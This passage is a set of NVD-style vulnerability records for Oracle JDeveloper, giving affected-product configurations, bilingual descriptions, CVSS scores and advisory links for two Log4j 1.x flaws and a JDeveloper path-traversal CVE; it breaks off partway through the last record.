Vulnerabilities related to oracle - jdeveloper
Vulnerability from fkie_nvd
{ configurations: [ { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:apache:log4j:*:*:*:*:*:*:*:*", matchCriteriaId: "2A81678B-BD7A-42A5-84FF-DC2D3D650650", versionEndIncluding: "1.2.17", versionStartIncluding: "1.0.1", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:netapp:snapmanager:-:*:*:*:*:oracle:*:*", matchCriteriaId: "26A2B713-7D6D-420A-93A4-E0D983C983DF", vulnerable: true, }, { criteria: "cpe:2.3:a:netapp:snapmanager:-:*:*:*:*:sap:*:*", matchCriteriaId: "64DE38C8-94F1-4860-B045-F33928F676A8", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:broadcom:brocade_sannav:-:*:*:*:*:*:*:*", matchCriteriaId: "75B1EDA5-F189-440D-AD0E-C70DD2C0FEE5", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:qos:reload4j:*:*:*:*:*:*:*:*", matchCriteriaId: "EB681829-2B2A-4BDB-8DC5-B3C7D359F4C5", versionEndExcluding: "1.2.18.1", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:oracle:advanced_supply_chain_planning:12.1:*:*:*:*:*:*:*", matchCriteriaId: "A62E2A25-1AD7-4B4B-9D1B-F0DEA4550557", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:advanced_supply_chain_planning:12.2:*:*:*:*:*:*:*", matchCriteriaId: "0331158C-BBE0-42DB-8180-EB1FCD290567", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:business_intelligence:5.9.0.0.0:*:*:*:enterprise:*:*:*", matchCriteriaId: "B602F9E8-1580-436C-A26D-6E6F8121A583", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:business_intelligence:12.2.1.3.0:*:*:*:enterprise:*:*:*", matchCriteriaId: "77C3DD16-1D81-40E1-B312-50FBD275507C", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:business_intelligence:12.2.1.4.0:*:*:*:enterprise:*:*:*", matchCriteriaId: "81DAC8C0-D342-44B5-9432-6B88D389584F", vulnerable: true, }, { criteria: 
"cpe:2.3:a:oracle:business_process_management_suite:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "E869C417-C0E6-4FC3-B406-45598A1D1906", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:business_process_management_suite:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "DFEFE2C0-7B98-44F9-B3AD-D6EC607E90DA", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_eagle_ftp_table_base_retrieval:4.5:*:*:*:*:*:*:*", matchCriteriaId: "C68536CA-C7E2-4228-A6B8-F0DB6A9D29EC", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_instant_messaging_server:10.0.1.5.0:*:*:*:*:*:*:*", matchCriteriaId: "C4A94B36-479F-48F2-9B9E-ACEA2589EF48", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_messaging_server:8.1:*:*:*:*:*:*:*", matchCriteriaId: "E1214FDF-357A-4BB9-BADE-50FB2BD16D10", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_network_integrity:7.3.6:*:*:*:*:*:*:*", matchCriteriaId: "B21E6EEF-2AB7-4E96-B092-1F49D11B4175", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_offline_mediation_controller:*:*:*:*:*:*:*:*", matchCriteriaId: "61A2E42A-4EF2-437D-A0EC-4A6A4F1EBD11", versionEndExcluding: "12.0.0.4.4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_offline_mediation_controller:12.0.0.5.0:*:*:*:*:*:*:*", matchCriteriaId: "5933FEA2-B79E-4EE7-B821-54D676B45734", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_unified_inventory_management:7.4.1:*:*:*:*:*:*:*", matchCriteriaId: "A7637F8B-15F1-42E2-BE18-E1FF7C66587D", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_unified_inventory_management:7.4.2:*:*:*:*:*:*:*", matchCriteriaId: "E43D793A-7756-4D58-A8ED-72DC4EC9CEA7", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:e-business_suite_cloud_manager_and_cloud_backup_module:*:*:*:*:*:*:*:*", matchCriteriaId: "86EF205C-9CB1-4772-94D1-0B744EF3342D", versionEndExcluding: "2.2.1.1.1", vulnerable: true, }, { criteria: 
"cpe:2.3:a:oracle:e-business_suite_cloud_manager_and_cloud_backup_module:2.2.1.1.1:*:*:*:*:*:*:*", matchCriteriaId: "6ED0EE39-C080-4E75-AE0F-3859B57EF851", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_base_platform:13.4.0.0:*:*:*:*:*:*:*", matchCriteriaId: "D26F3E23-F1A9-45E7-9E5F-0C0A24EE3783", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_base_platform:13.5.0.0:*:*:*:*:*:*:*", matchCriteriaId: "6E8758C8-87D3-450A-878B-86CE8C9FC140", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_revenue_management_and_billing_analytics:2.7.0.0:*:*:*:*:*:*:*", matchCriteriaId: "054B56E0-F11B-4939-B7E1-E722C67A041A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_revenue_management_and_billing_analytics:2.7.0.1:*:*:*:*:*:*:*", matchCriteriaId: "250A493C-E052-4978-ABBE-786DC8038448", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_revenue_management_and_billing_analytics:2.8.0.0:*:*:*:*:*:*:*", matchCriteriaId: "2E2B771B-230A-4811-94D7-065C2722E428", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:healthcare_foundation:8.1.0:*:*:*:*:*:*:*", matchCriteriaId: "E67501BE-206A-49FD-8CBA-22935DF917F1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:hyperion_data_relationship_management:*:*:*:*:*:*:*:*", matchCriteriaId: "E8E7FBA9-0FFF-4C86-B151-28C17A142E0B", versionEndExcluding: "11.2.8.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:hyperion_infrastructure_technology:*:*:*:*:*:*:*:*", matchCriteriaId: "55BBCD48-BCC6-4E19-A4CE-970E524B9FF4", versionEndExcluding: "11.2.8.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:identity_management_suite:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "1489DDA7-EDBE-404C-B48D-F0B52B741708", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:identity_management_suite:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "535BC19C-21A1-48E3-8CC0-B276BA5D494E", vulnerable: true, }, { criteria: 
"cpe:2.3:a:oracle:identity_manager_connector:11.1.1.5.0:*:*:*:*:*:*:*", matchCriteriaId: "9D7EA92D-9F26-4292-991A-891597337DFD", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "228DA523-4D6D-48C5-BDB0-DB1A60F23F8B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:middleware_common_libraries_and_tools:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "9AB179A8-DFB7-4DCF-8DE3-096F376989F1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:mysql_enterprise_monitor:*:*:*:*:*:*:*:*", matchCriteriaId: "B0EBAC6D-D0CE-42A1-AEA0-2D50C8035747", versionEndIncluding: "8.0.29", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:tuxedo:12.2.2.0.0:*:*:*:*:*:*:*", matchCriteriaId: "EB7D0A30-3986-49AB-B7F3-DAE0024504BA", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:weblogic_server:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "F14A818F-AA16-4438-A3E4-E64C9287AC66", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:weblogic_server:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "4A5BB153-68E0-4DDA-87D1-0D9AB7F0A418", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:weblogic_server:14.1.1.0.0:*:*:*:*:*:*:*", matchCriteriaId: "04BCDC24-4A21-473C-8733-0D9CFB38A752", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, ], cveTags: [], descriptions: [ { lang: "en", value: "JMSSink in all versions of Log4j 1.x is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration or if the configuration references an LDAP service the attacker has access to. The attacker can provide a TopicConnectionFactoryBindingName configuration causing JMSSink to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-4104. Note this issue only affects Log4j 1.x when specifically configured to use JMSSink, which is not the default. Apache Log4j 1.2 reached end of life in August 2015. 
Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions.", }, { lang: "es", value: "JMSSink en todas las versiones de Log4j 1.x, es vulnerable a una deserialización de datos no confiables cuando el atacante presenta acceso de escritura a la configuración de Log4j o si la configuración hace referencia a un servicio LDAP al que el atacante presenta acceso. El atacante puede proporcionar una configuración TopicConnectionFactoryBindingName causando que JMSSink lleve a cabo peticiones JNDI que resulten en la ejecución de código remota de forma similar a CVE-2021-4104. Tenga en cuenta que este problema sólo afecta a Log4j versiones 1.x cuando es configurado específicamente para usar JMSSink, que no es el predeterminado. Apache Log4j versión 1.2 llegó al final de su vida útil en agosto de 2015. Los usuarios deberían actualizar a Log4j 2 ya que aborda otros numerosos problemas de las versiones anteriores", }, ], id: "CVE-2022-23302", lastModified: "2024-11-21T06:48:21.983", metrics: { cvssMetricV2: [ { acInsufInfo: false, baseSeverity: "MEDIUM", cvssData: { accessComplexity: "MEDIUM", accessVector: "NETWORK", authentication: "SINGLE", availabilityImpact: "PARTIAL", baseScore: 6, confidentialityImpact: "PARTIAL", integrityImpact: "PARTIAL", vectorString: "AV:N/AC:M/Au:S/C:P/I:P/A:P", version: "2.0", }, exploitabilityScore: 6.8, impactScore: 6.4, obtainAllPrivilege: false, obtainOtherPrivilege: false, obtainUserPrivilege: false, source: "nvd@nist.gov", type: "Primary", userInteractionRequired: false, }, ], cvssMetricV31: [ { cvssData: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 8.8, baseSeverity: "HIGH", confidentialityImpact: "HIGH", integrityImpact: "HIGH", privilegesRequired: "LOW", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", version: "3.1", }, exploitabilityScore: 2.8, impactScore: 5.9, source: "nvd@nist.gov", type: 
"Primary", }, ], }, published: "2022-01-18T16:15:08.300", references: [ { source: "security@apache.org", tags: [ "Mailing List", "Third Party Advisory", ], url: "http://www.openwall.com/lists/oss-security/2022/01/18/3", }, { source: "security@apache.org", tags: [ "Mailing List", "Mitigation", "Vendor Advisory", ], url: "https://lists.apache.org/thread/bsr3l5qz4g0myrjhy9h67bcxodpkwj4w", }, { source: "security@apache.org", tags: [ "Vendor Advisory", ], url: "https://logging.apache.org/log4j/1.2/index.html", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://security.netapp.com/advisory/ntap-20220217-0006/", }, { source: "security@apache.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { source: "security@apache.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujul2022.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Mailing List", "Third Party Advisory", ], url: "http://www.openwall.com/lists/oss-security/2022/01/18/3", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Mailing List", "Mitigation", "Vendor Advisory", ], url: "https://lists.apache.org/thread/bsr3l5qz4g0myrjhy9h67bcxodpkwj4w", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Vendor Advisory", ], url: "https://logging.apache.org/log4j/1.2/index.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://security.netapp.com/advisory/ntap-20220217-0006/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujul2022.html", }, ], sourceIdentifier: "security@apache.org", vulnStatus: "Modified", weaknesses: [ { description: 
[ { lang: "en", value: "CWE-502", }, ], source: "security@apache.org", type: "Secondary", }, { description: [ { lang: "en", value: "CWE-502", }, ], source: "nvd@nist.gov", type: "Primary", }, ], }
Vulnerability from fkie_nvd
Source | URL | Tags | |
---|---|---|---|
secalert_us@oracle.com | http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html | Patch, Vendor Advisory | |
secalert_us@oracle.com | http://www.securityfocus.com/bid/102569 | Third Party Advisory, VDB Entry | |
secalert_us@oracle.com | http://www.securitytracker.com/id/1040207 | Third Party Advisory, VDB Entry | |
secalert_us@oracle.com | https://www.exploit-db.com/exploits/43848/ | Third Party Advisory, VDB Entry | |
af854a3a-2127-422b-91ae-364da2661108 | http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html | Patch, Vendor Advisory | |
af854a3a-2127-422b-91ae-364da2661108 | http://www.securityfocus.com/bid/102569 | Third Party Advisory, VDB Entry | |
af854a3a-2127-422b-91ae-364da2661108 | http://www.securitytracker.com/id/1040207 | Third Party Advisory, VDB Entry | |
af854a3a-2127-422b-91ae-364da2661108 | https://www.exploit-db.com/exploits/43848/ | Third Party Advisory, VDB Entry |
Vendor | Product | Version | |
---|---|---|---|
oracle | jdeveloper | 11.1.1.7.0 | |
oracle | jdeveloper | 11.1.1.7.1 | |
oracle | jdeveloper | 11.1.1.9.0 | |
oracle | jdeveloper | 11.1.2.4.0 | |
oracle | jdeveloper | 12.1.3.0.0 | |
oracle | jdeveloper | 12.2.1.2.0 |
{ configurations: [ { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:oracle:jdeveloper:11.1.1.7.0:*:*:*:*:*:*:*", matchCriteriaId: "07EF593B-376C-4367-B9FB-1F429062576C", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:11.1.1.7.1:*:*:*:*:*:*:*", matchCriteriaId: "9E9124B7-0F2C-4018-B5B5-5BA659333933", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:11.1.1.9.0:*:*:*:*:*:*:*", matchCriteriaId: "A7506589-9B3B-49BA-B826-774BFDCC45B8", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:11.1.2.4.0:*:*:*:*:*:*:*", matchCriteriaId: "2B70A973-A5C5-4E51-B93C-C22888E24FF1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:12.1.3.0.0:*:*:*:*:*:*:*", matchCriteriaId: "042C243F-EDFE-4A04-AB0B-26E73CC34837", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:12.2.1.2.0:*:*:*:*:*:*:*", matchCriteriaId: "739DC3EA-E25A-449B-8468-9A65AECC47C4", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, ], cveTags: [], descriptions: [ { lang: "en", value: "Vulnerability in the Oracle JDeveloper component of Oracle Fusion Middleware (subcomponent: Deployment). Supported versions that are affected are 11.1.1.7.0, 11.1.1.7.1, 11.1.1.9.0, 11.1.2.4.0, 12.1.3.0.0 and 12.2.1.2.0. Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where Oracle JDeveloper executes to compromise Oracle JDeveloper. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle JDeveloper, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle JDeveloper accessible data as well as unauthorized read access to a subset of Oracle JDeveloper accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle JDeveloper. 
CVSS 3.0 Base Score 4.7 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:H/UI:R/S:C/C:L/I:L/A:L).", }, { lang: "es", value: "Vulnerabilidad en el componente Oracle JDeveloper de Oracle Fusion Middleware (subcomponente: Deployment). Las versiones soportadas que se han visto afectadas son la 11.1.1.7.0, 11.1.1.7.1, 11.1.1.9.0, 11.1.2.4.0, 12.1.3.0.0 y la 12.2.1.2.0 Una vulnerabilidad difícilmente explotable permite que un atacante con un alto nivel de privilegios y con permisos de inicio de sesión en la infraestructura en la que se ejecuta Oracle JDeveloper comprometa la seguridad de Oracle JDeveloper. Para que los ataques tengan éxito, se necesita la participación de otra persona diferente del atacante y, aunque la vulnerabilidad está presente en Oracle JDeveloper, los ataques podrían afectar seriamente a productos adicionales. Los ataques exitosos a esta vulnerabilidad pueden resultar en el acceso no autorizado de actualización, inserción o supresión de algunos de los datos accesibles de Oracle JDeveloper, así como el acceso de lectura sin autorización a un subconjunto de datos accesibles de Oracle JDeveloper. Además, esto podría dar lugar a que el atacante consiga provocar una denegación de servicio parcial (DoS parcial) de Oracle JDeveloper. CVSS 3.0 Base Score 4.7 (impactos en la confidencialidad, integridad y disponibilidad). 
Vector CVSS: (CVSS:3.0/AV:L/AC:H/PR:H/UI:R/S:C/C:L/I:L/A:L).", }, ], id: "CVE-2017-10273", lastModified: "2024-11-21T03:05:48.103", metrics: { cvssMetricV2: [ { acInsufInfo: false, baseSeverity: "LOW", cvssData: { accessComplexity: "HIGH", accessVector: "LOCAL", authentication: "NONE", availabilityImpact: "PARTIAL", baseScore: 3.7, confidentialityImpact: "PARTIAL", integrityImpact: "PARTIAL", vectorString: "AV:L/AC:H/Au:N/C:P/I:P/A:P", version: "2.0", }, exploitabilityScore: 1.9, impactScore: 6.4, obtainAllPrivilege: false, obtainOtherPrivilege: false, obtainUserPrivilege: false, source: "nvd@nist.gov", type: "Primary", userInteractionRequired: true, }, ], cvssMetricV30: [ { cvssData: { attackComplexity: "HIGH", attackVector: "LOCAL", availabilityImpact: "LOW", baseScore: 4.7, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "HIGH", scope: "CHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.0/AV:L/AC:H/PR:H/UI:R/S:C/C:L/I:L/A:L", version: "3.0", }, exploitabilityScore: 0.6, impactScore: 3.7, source: "nvd@nist.gov", type: "Primary", }, ], }, published: "2018-01-18T02:29:16.130", references: [ { source: "secalert_us@oracle.com", tags: [ "Patch", "Vendor Advisory", ], url: "http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html", }, { source: "secalert_us@oracle.com", tags: [ "Third Party Advisory", "VDB Entry", ], url: "http://www.securityfocus.com/bid/102569", }, { source: "secalert_us@oracle.com", tags: [ "Third Party Advisory", "VDB Entry", ], url: "http://www.securitytracker.com/id/1040207", }, { source: "secalert_us@oracle.com", tags: [ "Third Party Advisory", "VDB Entry", ], url: "https://www.exploit-db.com/exploits/43848/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Vendor Advisory", ], url: "http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", 
"VDB Entry", ], url: "http://www.securityfocus.com/bid/102569", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", "VDB Entry", ], url: "http://www.securitytracker.com/id/1040207", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", "VDB Entry", ], url: "https://www.exploit-db.com/exploits/43848/", }, ], sourceIdentifier: "secalert_us@oracle.com", vulnStatus: "Modified", weaknesses: [ { description: [ { lang: "en", value: "CWE-22", }, ], source: "nvd@nist.gov", type: "Primary", }, ], }
Vulnerability from fkie_nvd
{ configurations: [ { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:apache:log4j:*:*:*:*:*:*:*:*", matchCriteriaId: "0C02831A-AD76-43D3-BEB1-DA94FA70A25E", versionEndIncluding: "1.2.17", versionStartIncluding: "1.2", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:netapp:snapmanager:-:*:*:*:*:oracle:*:*", matchCriteriaId: "26A2B713-7D6D-420A-93A4-E0D983C983DF", vulnerable: true, }, { criteria: "cpe:2.3:a:netapp:snapmanager:-:*:*:*:*:sap:*:*", matchCriteriaId: "64DE38C8-94F1-4860-B045-F33928F676A8", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:broadcom:brocade_sannav:-:*:*:*:*:*:*:*", matchCriteriaId: "75B1EDA5-F189-440D-AD0E-C70DD2C0FEE5", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:qos:reload4j:*:*:*:*:*:*:*:*", matchCriteriaId: "FDAF3CC9-3827-4634-85B6-DA94368067EB", versionEndExcluding: "1.2.18.2", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:oracle:advanced_supply_chain_planning:12.1:*:*:*:*:*:*:*", matchCriteriaId: "A62E2A25-1AD7-4B4B-9D1B-F0DEA4550557", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:advanced_supply_chain_planning:12.2:*:*:*:*:*:*:*", matchCriteriaId: "0331158C-BBE0-42DB-8180-EB1FCD290567", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:business_intelligence:5.9.0.0.0:*:*:*:enterprise:*:*:*", matchCriteriaId: "B602F9E8-1580-436C-A26D-6E6F8121A583", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:business_intelligence:12.2.1.3.0:*:*:*:enterprise:*:*:*", matchCriteriaId: "77C3DD16-1D81-40E1-B312-50FBD275507C", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:business_intelligence:12.2.1.4.0:*:*:*:enterprise:*:*:*", matchCriteriaId: "81DAC8C0-D342-44B5-9432-6B88D389584F", vulnerable: true, }, { criteria: 
"cpe:2.3:a:oracle:business_process_management_suite:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "E869C417-C0E6-4FC3-B406-45598A1D1906", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:business_process_management_suite:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "DFEFE2C0-7B98-44F9-B3AD-D6EC607E90DA", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_eagle_ftp_table_base_retrieval:4.5:*:*:*:*:*:*:*", matchCriteriaId: "C68536CA-C7E2-4228-A6B8-F0DB6A9D29EC", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_instant_messaging_server:10.0.1.5.0:*:*:*:*:*:*:*", matchCriteriaId: "C4A94B36-479F-48F2-9B9E-ACEA2589EF48", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_messaging_server:8.1:*:*:*:*:*:*:*", matchCriteriaId: "E1214FDF-357A-4BB9-BADE-50FB2BD16D10", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_network_integrity:7.3.6:*:*:*:*:*:*:*", matchCriteriaId: "B21E6EEF-2AB7-4E96-B092-1F49D11B4175", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_offline_mediation_controller:*:*:*:*:*:*:*:*", matchCriteriaId: "61A2E42A-4EF2-437D-A0EC-4A6A4F1EBD11", versionEndExcluding: "12.0.0.4.4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_offline_mediation_controller:12.0.0.5.0:*:*:*:*:*:*:*", matchCriteriaId: "5933FEA2-B79E-4EE7-B821-54D676B45734", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_unified_inventory_management:7.4.1:*:*:*:*:*:*:*", matchCriteriaId: "A7637F8B-15F1-42E2-BE18-E1FF7C66587D", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_unified_inventory_management:7.4.2:*:*:*:*:*:*:*", matchCriteriaId: "E43D793A-7756-4D58-A8ED-72DC4EC9CEA7", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:e-business_suite_cloud_manager_and_cloud_backup_module:*:*:*:*:*:*:*:*", matchCriteriaId: "86EF205C-9CB1-4772-94D1-0B744EF3342D", versionEndExcluding: "2.2.1.1.1", vulnerable: true, }, { criteria: 
"cpe:2.3:a:oracle:e-business_suite_cloud_manager_and_cloud_backup_module:2.2.1.1.1:*:*:*:*:*:*:*", matchCriteriaId: "6ED0EE39-C080-4E75-AE0F-3859B57EF851", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:e-business_suite_information_discovery:*:*:*:*:*:*:*:*", matchCriteriaId: "4D63C2CE-622B-48A8-BD74-09A9B05EDE7C", versionEndIncluding: "12.2.11", versionStartIncluding: "12.2.3", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_base_platform:13.4.0.0:*:*:*:*:*:*:*", matchCriteriaId: "D26F3E23-F1A9-45E7-9E5F-0C0A24EE3783", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_base_platform:13.5.0.0:*:*:*:*:*:*:*", matchCriteriaId: "6E8758C8-87D3-450A-878B-86CE8C9FC140", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_revenue_management_and_billing_analytics:2.7.0.0:*:*:*:*:*:*:*", matchCriteriaId: "054B56E0-F11B-4939-B7E1-E722C67A041A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_revenue_management_and_billing_analytics:2.7.0.1:*:*:*:*:*:*:*", matchCriteriaId: "250A493C-E052-4978-ABBE-786DC8038448", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_revenue_management_and_billing_analytics:2.8.0.0:*:*:*:*:*:*:*", matchCriteriaId: "2E2B771B-230A-4811-94D7-065C2722E428", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:healthcare_foundation:8.1.0:*:*:*:*:*:*:*", matchCriteriaId: "E67501BE-206A-49FD-8CBA-22935DF917F1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:hyperion_data_relationship_management:*:*:*:*:*:*:*:*", matchCriteriaId: "E8E7FBA9-0FFF-4C86-B151-28C17A142E0B", versionEndExcluding: "11.2.8.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:hyperion_infrastructure_technology:*:*:*:*:*:*:*:*", matchCriteriaId: "55BBCD48-BCC6-4E19-A4CE-970E524B9FF4", versionEndExcluding: "11.2.8.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:identity_management_suite:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "1489DDA7-EDBE-404C-B48D-F0B52B741708", 
vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:identity_management_suite:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "535BC19C-21A1-48E3-8CC0-B276BA5D494E", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:identity_manager_connector:11.1.1.5.0:*:*:*:*:*:*:*", matchCriteriaId: "9D7EA92D-9F26-4292-991A-891597337DFD", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "228DA523-4D6D-48C5-BDB0-DB1A60F23F8B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:middleware_common_libraries_and_tools:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "9AB179A8-DFB7-4DCF-8DE3-096F376989F1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:mysql_enterprise_monitor:*:*:*:*:*:*:*:*", matchCriteriaId: "B0EBAC6D-D0CE-42A1-AEA0-2D50C8035747", versionEndIncluding: "8.0.29", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_extract_transform_and_load:13.2.5:*:*:*:*:*:*:*", matchCriteriaId: "30501D23-5044-477A-8DC3-7610126AEFD7", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:tuxedo:12.2.2.0.0:*:*:*:*:*:*:*", matchCriteriaId: "EB7D0A30-3986-49AB-B7F3-DAE0024504BA", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:weblogic_server:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "F14A818F-AA16-4438-A3E4-E64C9287AC66", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:weblogic_server:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "4A5BB153-68E0-4DDA-87D1-0D9AB7F0A418", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:weblogic_server:14.1.1.0.0:*:*:*:*:*:*:*", matchCriteriaId: "04BCDC24-4A21-473C-8733-0D9CFB38A752", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, ], cveTags: [], descriptions: [ { lang: "en", value: "By design, the JDBCAppender in Log4j 1.2.x accepts an SQL statement as a configuration parameter where the values to be inserted are converters from PatternLayout. The message converter, %m, is likely to always be included. 
